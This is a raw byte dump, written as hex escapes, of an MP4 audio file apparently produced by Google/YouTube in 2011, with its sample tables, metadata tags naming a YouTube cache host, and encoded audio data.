 \x00\x00\x02\x20\x00\x00\x03\x5D\x00\x00\x01\xE6\x00\x00\x01\xE3\x00\x00\x03\xA0\x00\x00\x02\x3A\x00\x00\x02\x12\x00\x00
 \x03\x4C\x00\x00\x01\xD4\x00\x00\x01\xD2\x00\x00\x01\xC5\x00\x00\x04\x0B\x00\x00\x02\x08\x00\x00\x01\xFA\x00\x00\x03\x68
 \x00\x00\x01\xC6\x00\x00\x01\x94\x00\x00\x05\x5E\x00\x00\x00\xFD\x00\x00\x02\xF1\x00\x00\x03\xCC\x00\x00\x02\x4A\x00\x00
 \x03\x47\x00\x00\x01\x71\x00\x00\x01\x77\x00\x00\x01\xA5\x00\x00\x01\x1D\x00\x00\x02\x31\x00\x00\x02\x6C\x00\x00\x02
 \x5F\x00\x00\x02\x2A\x00\x00\x01\xD3\x00\x00\x02\x1D\x00\x00\x01\x71\x00\x00\x02\x04\x00\x00\x02\x7D\x00\x00\x01\x62\x00
 \x00\x01\x9E\x00\x00\x01\x7D\x00\x00\x01\xBC\x00\x00\x01\xAD\x00\x00\x01\xDC\x00\x00\x01\x76\x00\x00\x01\xBF\x00\x00\x01
 \x48\x00\x00\x01\xD7\x00\x00\x02\x29\x00\x00\x02\x03\x00\x00\x02\x7C\x00\x00\x01\x77\x00\x00\x01\x6F\x00\x00\x01\x2A\x00
 \x00\x01\xE0\x00\x00\x01\x7E\x00\x00\x01\x72\x00\x00\x01\x81\x00\x00\x01\x90\x00\x00\x01\xC4\x00\x00\x01\x1B\x00\x00\x01
 \x73\x00\x00\x02\x02\x00\x00\x01\x36\x00\x00\x01\x5A\x00\x00\x01\x8C\x00\x00\x02\x1B\x00\x00\x01\xB7\x00\x00\x01\xC2\x00
 \x00\x01\xAC\x00\x00\x01\xDA\x00\x00\x01\x8B\x00\x00\x01\x63\x00\x00\x01\xB5\x00\x00\x01\x76\x00\x00\x01\x52\x00\x00\x01
 \x84\x00\x00\x01\x6C\x00\x00\x01\xBF\x00\x00\x06\x65\x00\x00\x01\x86\x00\x00\x02\x03\x00\x00\x00\xEF\x00\x00\x01\xE1\x00
 \x00\x03\x13\x00\x00\x02\x40\x00\x00\x01\x86\x00\x00\x01\xB0\x00\x00\x01\xD1\x00\x00\x01\x78\x00\x00\x01\xE5\x00\x00\x01
 \xD6\x00\x00\x00\x70\x73\x74\x63\x6F\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x0F\x4D\x00\x00\x27\x20\x00\x00\x39\xD5\x00
 \x00\x4F\xCF\x00\x00\x62\xBA\x00\x00\x75\x1D\x00\x00\x87\x37\x00\x00\x9A\x85\x00\x00\xAF\x7B\x00\x00\xC2\x04\x00\x00\xD6
 \x7D\x00\x00\xE8\xA2\x00\x00\xFC\x16\x00\x01\x0B\xC2\x00\x01\x1C\x5D\x00\x01\x2B\x87\x00\x01\x3A\x12\x00\x01\x49\x8D\x00
 \x01\x56\x5B\x00\x01\x65\x6C\x00\x01\x73\x63\x00\x01\x81\x9E\x00\x01\x95\x8F\x00\x01\xA5\x54\x00\x00\x06\x0D\x74\x72\x61
 \x6B\x00\x00\x00\x5C\x74\x6B\x68\x64\x00\x00\x00\x01\xCC\x8C\xBA\xF2\xCC\x8C\xBA\xF2\x00\x00\x00\x02\x00\x00\x00\x00\x00
 \x00\x19\xE7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x05\xA9\x6D\x64\x69\x61\x00\x00\x00\x20\x6D\x64\x68\x64\x00\x00\x00\x00\xCC\x8C\xBA\xF2
 \xCC\x8C\xBA\xF2\x00\x00\x56\x22\x00\x03\xB8\x00\x55\xC4\x00\x00\x00\x00\x00\x4C\x68\x64\x6C\x72\x00\x00\x00\x00\x00\x00
 \x00\x00\x73\x6F\x75\x6E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x49\x73\x6F\x4D\x65\x64\x69\x61\x20\x46\x69
 \x6C\x65\x20\x50\x72\x6F\x64\x75\x63\x65\x64\x20\x62\x79\x20\x47\x6F\x6F\x67\x6C\x65\x2C\x20\x35\x2D\x31\x31\x2D\x32\x30
 \x31\x31\x00\x00\x00\x05\x35\x6D\x69\x6E\x66\x00\x00\x00\x10\x73\x6D\x68\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x24\x64\x69\x6E\x66\x00\x00\x00\x1C\x64\x72\x65\x66\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x75\x72\x6C\x20\x00
 \x00\x00\x01\x00\x00\x04\xF9\x73\x74\x62\x6C\x00\x00\x00\x69\x73\x74\x73\x64\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00
 \x59\x6D\x70\x34\x61\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x10\x00\x00\x00\x00\x56
 \x22\x00\x00\x00\x00\x00\x35\x65\x73\x64\x73\x00\x00\x00\x00\x03\x27\x00\x00\x00\x04\x1F\x40\x15\x00\x00\xD4\x00\x00\x68
 \x50\x00\x00\x5D\xF8\x05\x10\x13\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x01\x02\x00\x00\x00\x18
 \x73\x74\x74\x73\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xEE\x00\x00\x04\x00\x00\x00\x00\x34\x73\x74\x73\x63\x00\x00
 \x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x0B\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x0A\x00\x00\x00\x01
 \x00\x00\x00\x18\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x03\xCC\x73\x74\x73\x7A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\xEE\x00\x00\x00\x8B\x00\x00\x00\x8B\x00\x00\x00\xD4\x00\x00\x00\xB2\x00\x00\x00\xA4\x00\x00\x00\x91\x00\x00\x00\x90
 \x00\x00\x00\x92\x00\x00\x00\x90\x00\x00\x00\x92\x00\x00\x00\x96\x00\x00\x00\x89\x00\x00\x00\x82\x00\x00\x00\x84\x00\x00
 \x00\x9A\x00\x00\x00\x8B\x00\x00\x00\x92\x00\x00\x00\x89\x00\x00\x00\x80\x00\x00\x00\x7B\x00\x00\x00\x7E\x00\x00\x00\x87
 \x00\x00\x00\x90\x00\x00\x00\x88\x00\x00\x00\x82\x00\x00\x00\x82\x00\x00\x00\x81\x00\x00\x00\x9D\x00\x00\x00\x9A\x00\x00
 \x00\x88\x00\x00\x00\x80\x00\x00\x00\x87\x00\x00\x00\x84\x00\x00\x00\x88\x00\x00\x00\x8A\x00\x00\x00\x82\x00\x00\x00\x85
 \x00\x00\x00\x8F\x00\x00\x00\x8B\x00\x00\x00\x84\x00\x00\x00\x8A\x00\x00\x00\x88\x00\x00\x00\x8A\x00\x00\x00\x8C\x00\x00
 \x00\x8C\x00\x00\x00\x85\x00\x00\x00\x95\x00\x00\x00\x88\x00\x00\x00\x87\x00\x00\x00\x8F\x00\x00\x00\x82\x00\x00\x00\x88
 \x00\x00\x00\x93\x00\x00\x00\x8A\x00\x00\x00\x92\x00\x00\x00\x86\x00\x00\x00\x88\x00\x00\x00\x89\x00\x00\x00\x86\x00\x00
 \x00\x89\x00\x00\x00\x87\x00\x00\x00\x8B\x00\x00\x00\x94\x00\x00\x00\x8A\x00\x00\x00\x89\x00\x00\x00\x89\x00\x00\x00\x88
 \x00\x00\x00\x8E\x00\x00\x00\x8E\x00\x00\x00\x8D\x00\x00\x00\x95\x00\x00\x00\x8D\x00\x00\x00\x86\x00\x00\x00\x8E\x00\x00
 \x00\x87\x00\x00\x00\x8C\x00\x00\x00\x8C\x00\x00\x00\x8E\x00\x00\x00\x91\x00\x00\x00\x89\x00\x00\x00\x8B\x00\x00\x00\x90
 \x00\x00\x00\x85\x00\x00\x00\x8E\x00\x00\x00\x8E\x00\x00\x00\x8E\x00\x00\x00\x8B\x00\x00\x00\x8B\x00\x00\x00\x90\x00\x00
 \x00\x8D\x00\x00\x00\x8B\x00\x00\x00\x8C\x00\x00\x00\x88\x00\x00\x00\x93\x00\x00\x00\x89\x00\x00\x00\x90\x00\x00\x00\x84
 \x00\x00\x00\x90\x00\x00\x00\x7F\x00\x00\x00\x8A\x00\x00\x00\x90\x00\x00\x00\x8D\x00\x00\x00\x8C\x00\x00\x00\x8D\x00\x00
 \x00\x93\x00\x00\x00\x7B\x00\x00\x00\x94\x00\x00\x00\x8A\x00\x00\x00\x8D\x00\x00\x00\x95\x00\x00\x00\x8B\x00\x00\x00\x98
 \x00\x00\x00\x8F\x00\x00\x00\x8B\x00\x00\x00\x89\x00\x00\x00\x8F\x00\x00\x00\x87\x00\x00\x00\x8B\x00\x00\x00\x90\x00\x00
 \x00\x9B\x00\x00\x00\x83\x00\x00\x00\x89\x00\x00\x00\x84\x00\x00\x00\x84\x00\x00\x00\x8C\x00\x00\x00\x85\x00\x00\x00
 \x8E\x00\x00\x00\x95\x00\x00\x00\x92\x00\x00\x00\x8E\x00\x00\x00\x84\x00\x00\x00\x8B\x00\x00\x00\x8A\x00\x00\x00\x89\x00
 \x00\x00\x82\x00\x00\x00\x8B\x00\x00\x00\x8B\x00\x00\x00\x86\x00\x00\x00\x8A\x00\x00\x00\x81\x00\x00\x00\x90\x00\x00\x00
 \x85\x00\x00\x00\x88\x00\x00\x00\x8E\x00\x00\x00\x93\x00\x00\x00\x91\x00\x00\x00\x85\x00\x00\x00\x81\x00\x00\x00\x81\x00
 \x00\x00\x85\x00\x00\x00\x89\x00\x00\x00\x84\x00\x00\x00\x8F\x00\x00\x00\x89\x00\x00\x00\x87\x00\x00\x00\x8F\x00\x00\x00
 \x90\x00\x00\x00\x8F\x00\x00\x00\x86\x00\x00\x00\xA1\x00\x00\x00\x89\x00\x00\x00\x8B\x00\x00\x00\x81\x00\x00\x00\x91\x00
 \x00\x00\x8C\x00\x00\x00\x8D\x00\x00\x00\x92\x00\x00\x00\xAE\x00\x00\x00\x8B\x00\x00\x00\x89\x00\x00\x00\x87\x00\x00\x00
 \x8F\x00\x00\x00\x85\x00\x00\x00\x90\x00\x00\x00\x8E\x00\x00\x00\x8E\x00\x00\x00\x8A\x00\x00\x00\x82\x00\x00\x00\x8B\x00
 \x00\x00\x86\x00\x00\x00\x8F\x00\x00\x00\x88\x00\x00\x00\x82\x00\x00\x00\x8C\x00\x00\x00\x97\x00\x00\x00\x86\x00\x00\x00
 \x85\x00\x00\x00\x8C\x00\x00\x00\x89\x00\x00\x00\x90\x00\x00\x00\x88\x00\x00\x00\x8C\x00\x00\x00\x99\x00\x00\x00\x8E\x00
 \x00\x00\x87\x00\x00\x00\x7F\x00\x00\x00\x85\x00\x00\x00\x8C\x00\x00\x00\x86\x00\x00\x00\x8D\x00\x00\x00\x90\x00\x00\x00
 \x83\x00\x00\x00\x8F\x00\x00\x00\x91\x00\x00\x00\x9A\x00\x00\x00\x88\x00\x00\x00\x89\x00\x00\x00\x84\x00\x00\x00\x8B\x00
 \x00\x00\x87\x00\x00\x00\x87\x00\x00\x00\x85\x00\x00\x00\x93\x00\x00\x00\x85\x00\x00\x00\x8C\x00\x00\x00\x99\x00\x00\x00
 \x8A\x00\x00\x00\x89\x00\x00\x00\x88\x00\x00\x00\x8A\x00\x00\x00\x8D\x00\x00\x00\x82\x00\x00\x00\x8C\x00\x00\x00\x8B\x00
 \x00\x00\x8B\x00\x00\x00\x84\x00\x00\x00\x88\x00\x00\x00\x95\x00\x00\x00\x8D\x00\x00\x00\x8C\x00\x00\x00\x8D\x00\x00\x00
 \x90\x00\x00\x00\x8D\x00\x00\x00\x88\x00\x00\x00\x8E\x00\x00\x00\x91\x00\x00\x00\x98\x00\x00\x00\x88\x00\x00\x00\x70\x73
 \x74\x63\x6F\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x20\x75\x00\x00\x34\x8D\x00\x00\x4A\x6C\x00\x00\x5D\x6E\x00\x00
 \x6F\xB9\x00\x00\x81\xD3\x00\x00\x95\x04\x00\x00\xAA\x08\x00\x00\xBC\x87\x00\x00\xD1\x10\x00\x00\xE3\x23\x00\x00\xF6
 \x8C\x00\x01\x06\x59\x00\x01\x17\x06\x00\x01\x26\x33\x00\x01\x34\x91\x00\x01\x43\xFC\x00\x01\x50\xEF\x00\x01\x60\x07\x00
 \x01\x6D\xF6\x00\x01\x7C\x33\x00\x01\x90\x1B\x00\x01\x9F\xE9\x00\x01\xAA\x87\x00\x00\x02\xF3\x75\x64\x74\x61\x00\x00\x02
 \xEB\x6D\x65\x74\x61\x00\x00\x00\x00\x00\x00\x00\x21\x68\x64\x6C\x72\x00\x00\x00\x00\x00\x00\x00\x00\x6D\x64\x69\x72\x61
 \x70\x70\x6C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\xBE\x69\x6C\x73\x74\x00\x00\x00\x19\x67\x73\x73\x74\x00\x00
 \x00\x11\x64\x61\x74\x61\x00\x00\x00\x01\x00\x00\x00\x00\x30\x00\x00\x00\x1D\x67\x73\x74\x64\x00\x00\x00\x15\x64\x61\x74
 \x61\x00\x00\x00\x01\x00\x00\x00\x00\x31\x31\x31\x39\x31\x00\x00\x00\x38\x67\x73\x73\x64\x00\x00\x00\x30\x64\x61\x74\x61
 \x00\x00\x00\x01\x00\x00\x00\x00\x42\x42\x43\x35\x44\x41\x45\x30\x37\x48\x48\x31\x33\x34\x39\x33\x37\x31\x38\x39\x31\x39
 \x32\x31\x35\x30\x33\x00\x00\x00\x00\x00\x00\x00\x00\x98\x67\x73\x70\x75\x00\x00\x00\x90\x64\x61\x74\x61\x00\x00\x00\x01
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x67\x73\x70\x6D\x00\x00\x00\x90\x64\x61\x74\x61\x00\x00
 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x18\x67\x73\x68\x68\x00\x00\x01\x10\x64\x61\x74\x61
 \x00\x00\x00\x01\x00\x00\x00\x00\x6F\x2D\x6F\x2D\x2D\x2D\x70\x72\x65\x66\x65\x72\x72\x65\x64\x2D\x2D\x2D\x73\x6E\x2D\x61
 \x30\x6A\x70\x6D\x2D\x61\x30\x6D\x65\x2D\x2D\x2D\x76\x32\x30\x2D\x2D\x2D\x6C\x73\x63\x61\x63\x68\x65\x37\x2E\x63\x2E\x79
 \x6F\x75\x74\x75\x62\x65\x2E\x63\x6F\x6D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x9F\x26\x6D\x64
 \x61\x74\x00\x00\x01\xB3\x00\x10\x07\x00\x00\x01\xB6\x10\xC3\x63\x0A\x8D\xBF\x8D\xB6\xFE\x36\xDB\xF8\xDB\x6F\xE3
 \x6D\xBF\x8D\xB6\xFE\x36\xDB\xF8\xDB\x6F\xE3\x6D\xBF\x8D\xB6\xFE\x36\xDB\xF1\x36\xA1\x6E\x1B\x17\x50\x91\x96\xE1\xB1\x73
 \xCE\xCB\xD9\xDE\x58\x49\x51\xBA\x59\xA4\xAA\xCF\xA2\x3A\x2E\xD0\x93\x0E\x7C\x6C\x5D\x42\x4A\xD3\x93\x16\xE1\xB1\x75\x09
 \x19\x6E\x1B\x17\x3F\x7E\x48\xCB\x70\xD8\x52\xCB\x70\xD8\x53\x9C\xE8\x65\xB8\x6C\x29\xA1\x05\xAE\xF1\x4A\xFC\x52\x8A\xA2
 \x44\x8F\x87\xBA\xCD\xB5\x7E\xB4\xB2\x1B\x58\x8F\xE6\xE1\xFB\x5D\x50\xA5\x72\x8D\x42\x26\x82\xDC\x36\x14\xC8\xE0
 \x3D\x2D\xE9\xA5\x85\x09\x7C\x8C\xB7\x0D\x8B\x9F\x94\xE1\xB0\xA7\x69\x24\x6A\x70\xD8\x52\xD4\xE1\xB0\xA5\xBE\xCD\xCB\x70
 \xD8\x53\x94\xE1\xB0\xA5\xA1\x82\x79\xF9\x1A\x97\x35\x2E\xCF\x92\x35\x2E\x6A\x5C\xF7\x8B\x2A\xDE\x1D\xB9\xB2\x90\xD1
 \xFB\x92\x4E\x86\x41\x26\x60\x29\x77\xBE\x6C\x6E\xEA\x0B\x24\xE7\x0D\x10\xC2\x9D\x02\x14\x68\xD9\xF2\xBF\x48\x44\xDC\xB7
 \xE0\x42\x8D\x39\x6E\xF4\x6D\x46\x93\x3E\x2F\x63\x37\xD5\xFA\x81\x46\x0F\x7A\x36\x39\x83\xD3\x41\x5C\x97\xC1\x8F\xE1\x06
 \x2C\x4F\x7B\xE6\x68\xDA\xFB\x29\x2A\xE1\x33\x0F\x99\x51\x9D\x66\x29\x43\x73\xD0\xED\x4B\x90\xB6\xCF\xA0\x58\x1B\xD0
 \xAB\xEE\xB1\xE5\xBE\xDC\xCB\xC4\x57\x64\x58\x51\xF5\xCB\x3E\xB8\x32\x91\xE6\x03\x01\x59\x4A\x27\xF4\x32\x30\x9B\x05
 \xEA\x95\xD5\x0D\x5E\xD4\x68\xAC\x0A\x7E\x46\x7F\x1F\x29\xA4\x85\x07\xBE\xD7\x8F\x36\xE5\x8F\x37\xF8\x0B\xCD\x82\xAD\x20
 \x73\x69\x47\xB4\x24\x9F\x17\xB1\xF6\xE3\x50\xB7\xB4\xDC\x92\x22\xE9\x39\xB2\xCE\x50\x60\x29\x09\x4B\x3A\x14\xA1\x93\xA8
 \x9B\x5C\x18\xA2\x60\x64\x75\x94\x4C\xD2\x49\x8C\x00\xD3\x76\xCE\xB3\x4D\xEF\x2E\xA2\xE9\x04\x88\x0D\x4B\x73\x66\xD9
 \xAB\x76\xFF\x5F\xAE\x4C\xCB\x93\x08\x97\xC5\x1A\xF6\x7B\xB3\xD3\x93\xA1\x32\x68\x82\xCA\xDA\x78\x68\x3D\x4A\xCB\x53\xC5
 \x96\x4E\xDB\x2A\xD2\x85\x2A\x05\xE6\x44\xB0\xEB\xC0\xAF\x09\xB5\x12\xA3\x04\xC3\xD4\xBF\x57\x26\xB3\x6C\x5D\x62\xA9\x05
 \xCE\x0A\x87\x12\x03\x07\x7E\x29\xA1\x93\xFC\x82\x7F\x8C\xCB\xE7\x6D\x0D\x30\x27\x69\x2B\xCE\xDA\x1A\x06\x0F\xB4\x58\x79
 \x26\x76\x7C\x35\x3C\x4D\x22\xA5\x09\x4B\x71\x68\x59\xB2\xC1\xA6\x11\x97\x8C\x82\xBE\x05\x04\x1A\x85\x62\x67\x91\x89
 \x9B\x69\x63\x7D\xBB\xC7\x9F\xD7\x8F\xB7\xE5\x16\xCD\xD9\x6C\x5B\xF6\xA1\x51\x08\xD6\x8D\xF9\x4F\x31\xAB\x74\xA6\x10\xD7
 \x5B\x9B\x97\x3D\xBC\xE0\xD3\x28\xCC\x6F\x1B\x5A\x77\x61\x6C\xE9\x2F\x42\xD4\x56\xCB\x29\x67\xB9\x0B\x32\x76\x2C\xA7\xE7
 \x1D\xF2\x55\x39\x3A\xAA\x29\xEA\x0B\xA4\x51\x55\xA6\x1C\x16\x7F\x57\x86\x97\x3D\x71\x3F\x14\x0D\xF7\x92\xF0\x3C\x47\xD1
 \x4D\x19\xBE\x1E\x0D\xC7\xD4\x33\x3F\xCD\x57\x7D\xD4\x39\xE7\x15\x6B\xD7\xDB\xFE\xB2\xDB\x65\x50\x3B\x40\xB9\x02\x3F\xF9
 \x6C\x5D\xA0\xC2\x9D\x31\x7E\xCE\x6A\x8E\x49\x79\xCE\xFF\x48\x1D\x68\x6C\x5E\xF3\x56\x84\xED\xA1\xB8\x7D\x84\x35\x87\x00
 \xAF\xA1\x42\x7B\xBF\xF3\x57\x55\xDC\x5A\x81\x4E\xAD\x01\x36\x37\x6D\x64\xBB\x79\x19\x9A\x20\xF2\x6A\x29\x54\x12\xAC\xA7
 \x38\x42\x42\x03\xFF\x57\x13\x02\xD2\x62\x50\xF1\x9D\x6D\xA4\xF7\xDC\x55\x3F\xDE\xDB\x22\x92\x88\x8E\xC3\xE6\x33\x62
 \x9E\x67\x49\x49\x85\x6A\xD5\xAB\xA2\x50\x7F\x00\xC3\x2C\x7F\x9F\x44\xBC\xEA\x8E\x9A\x45\xB8\xF3\xE1\x01\xBD\x67\xD7
 \xFF\xE7\x54\xEE\x76\x08\xB3\x39\x43\x37\xD5\x5E\xD8\x4C\x56\x5F\x27\xD2\xB6\x41\x50\xD0\x38\xAA\xBC\x57\xFD\x51\x87\xC6
 \x8D\xA5\x53\x47\xF6\xAD\xD4\x91\x12\x2E\xE2\x9C\x07\x15\xBA\x97\xD5\xCF\x0B\xD4\x08\x14\x19\x18\x3B\xD4\x29\xCD\x23\x13
 \x2A\x24\x77\x35\xB2\x5C\x9C\x19\x3C\x66\x5C\x9C\x41\x1D\xD9\x81\xD7\x98\xF8\xCE\xF7\x3B\x42\x45\x58\xDB\x12\x6F\x8D\xB6
 \xE7\x1E\x6F\xFC\x1A\xE4\x31\xBA\x3E\xC3\x41\x26\xC0\xB4\xCA\x79\xAC\x2B\xCF\x2F\x72\xCE\xA9\xD5\xFA\x37\xA1\x22\xE3\xA6
 \x76\xB2\xA3\x79\x65\xCE\xA2\x45\xC0\x94\xB0\xE5\x56\xCF\x26\xDD\xC0\x54\x29\x53\xB4\xD4\x0F\x6C\x8B\xD2\x24\xB3\x1A\x61
 \xB1\xC4\x61\x46\xA8\xEA\x99\xEC\x93\x61\x26\xAF\x6F\x10\xB9\xAF\x49\x1F\x62\x3D\xB8\x06\xBE\x1E\x4E\xF1\x6B\x86\x10\x67
 \x3A\x32\x62\xA8\xA0\xA9\xEA\xC7\x53\x8C\x56\x58\xCF\xE6\xD9\xD8\x36\x13\xAC\x06\xBD\xB7\x94\xB5\x42\x8B\xDE\xFE\xF5
 \x4C\x22\x8B\x75\x3F\x66\x28\x67\x9D\xCF\xE7\x37\xB0\xAE\x4D\x46\x4E\x93\x7F\x54\xCE\x28\x46\x6A\xC2\x08\x61\x23
 \x1A\x9B\x0A\x94\x37\xB8\x37\x25\x5C\x2A\xF9\xBC\xCF\xB1\xB9\x33\xF3\x2A\x29\x17\x58\x54\x59\x36\x59\x44\xD5\x90\x73\x87
 \x8B\x30\x9A\x2A\xD2\xFC\xAB\xCC\x50\x9D\xAC\x05\x45\x9B\xEB\xC2\x85\xF0\x69\xB1\x65\x89\x20\x50\x4B\x7D\x6A\x7B\xF1\x13
 \x58\xC6\x38\x87\x14\x6D\xFF\x49\x7B\x56\xE1\x32\x98\x0B\xE1\x9C\x50\x25\x2B\x8A\x7B\x97\x2E\xF8\x93\x2D\xCB\x8E\xE2\x47
 \x31\x32\x60\x54\xEB\x61\x9E\x83\x04\x83\x01\xFF\xC7\x09\x1B\x49\x46\xFD\xC2\xC2\x56\x94\xF4\x5C\x14\x1A\x48\x5E\xA1\x37
 \x39\xDA\x99\xBC\xDC\x25\xCD\xB7\xB0\xA6\x15\x89\x97\x80\x90\xD9\xA2\xF6\x47\x19\x09\x6F\x06\x68\x1C\x92\x55\x59
 \xAA\xBA\xA3\x8D\xC8\xA4\x31\xB0\x95\xC2\x81\xFF\x8B\x53\x6A\x89\xDA\x55\xB0\x6A\x89\x74\xBF\x55\x4B\x51\x95\xE0\xC9\x42
 \xD1\xEE\x40\xE0\x97\x6A\x4B\x1E\xB8\x1E\x6B\x8D\xB7\xA1\xB7\x05\xEE\x37\x16\xBC\x13\x30\x81\xFB\x59\xFE\x08\x85\x9B\xA4
 \xA3\x7C\x71\xE4\xC6\xDE\x69\x63\x79\xBE\xC5\x6F\x53\xEF\x47\xBD\xB4\x90\x1C\x50\x13\xEC\x47\xF2\x98\x0E\x50\xE4\xFC\x88
 \xC9\x68\x61\x1C\xDD\x9C\x6C\xBB\xFF\xFC\xE2\x89\x14\x49\xDD\xA8\x46\x47\xC5\x8C\x2D\xE2\xC6\x7F\x9F\xFC\x45\x64\xDB\x79
 \xC4\x3D\x21\x23\x85\x72\x5B\xDC\x2D\xF4\xED\x80\xE3\x47\xD7\xF6\xAA\x0F\xD4\x42\xDD\xD2\xCB\x66\xDD\x59\x44\x88\xB8
 \x8D\x4D\x14\x4C\x36\x23\x9F\x51\x93\x33\x2A\xCB\x11\x57\x54\xDD\x2A\x2B\x83\x70\x4C\xD2\xD9\x27\x25\xE0\x62\x14\xC6
 \x2D\xBF\xB5\x15\x5D\x74\x76\xA2\x09\xA1\xD6\x13\xA6\xE4\xB2\x48\xA7\x33\x21\x3D\xB4\x06\x5B\xA1\xED\x03\x1B\xCE\x70
 \xAB\xF3\x9D\xEF\x44\xF5\x5B\x88\x6E\x42\x45\xDE\x83\x57\x25\x51\x10\xF6\x91\x30\x9F\x82\x92\xFC\x3F\x9F\x35\x13\x17
 \xAB\x4C\xD2\xB9\x07\x33\xB7\x38\x0E\x23\x81\x03\xD3\xCA\x0B\x32\x79\x0E\x48\x79\x3C\xD1\x05\x89\xF4\x43\x79\x40\x96
 \xDC\x09\x8B\xA0\x3A\x61\xFC\xB4\x37\x0B\x73\x84\x46\x63\x41\xF7\x57\x5B\x7B\xDB\x56\xE5\x88\x86\x27\x69\xAA\xA5\xA9\x41
 \xC8\xAD\x81\x31\x6F\xE7\xDB\x97\x16\xCC\xAB\x54\x2F\xD9\x62\x31\x7A\x37\x9D\x07\x7E\xDD\xA2\x76\x21\x03\x01\x7F\x83\x06
 \x80\xE2\xB3\x11\x32\xF8\x73\x95\x6B\xEF\xF3\x4A\x17\x17\x3F\x04\x00\x64\x7A\x0C\x0A\xE0\x71\x59
 \x8F\x8D\xBC\xED\x8A\xDB\xA7\xF9\x45\x9F\x52\xFF\x94\x8A\xE3\x87\xD5\xE8\xA8\x5A\xD7\xB0\x8B\x49\x4D\xD2\x3D\x67\x4E\x50
 \xE3\x09\x41\x1D\xEF\x13\x5C\x3D\x1C\xB4\xDB\x7B\xCA\x59\xE8\x38\xB1\x7D\xA2\x28\x79\x16\xF6\x53\x74\xF0\xBF\xD7\x2F\x87
 \x39\xEE\x6D\xEA\xC3\x6D\x59\x00\x2F\x82\xA0\x2A\x93\x01\x00\x70\x7A\xD8\x3E\x6F\xFF\x7E\x0F\x12\x62\x2F\x55\xCD\xB2
 \xAE\x83\x94\xB6\xFC\xEA\xB6\x6E\x07\xBC\x06\x47\x7B\xE9\xBC\xF1\x28\xC0\x6B\x12\x72\xD2\xAF\xE0\x6A\xA2\xEC\x86\xD6
 \xBB\x0E\xA7\x89\x98\xC1\xB6\x22\xC9\x83\x7F\x8D\xA2\x28\xB9\x9C\x1F\x35\xDB\x54\x23\x9C\xAB\xEA\x21\xAC\x3A\xE7\x85\xE5
 \xB3\x30\x73\x38\x88\x40\xE8\xCD\x4C\x0A\xD2\xE7\x2F\x60\xD3\x87\xCC\x07\x02\xFD\x09\x70\x80\xD1\xA0\x76\xE8\x4B\xA8\xB6
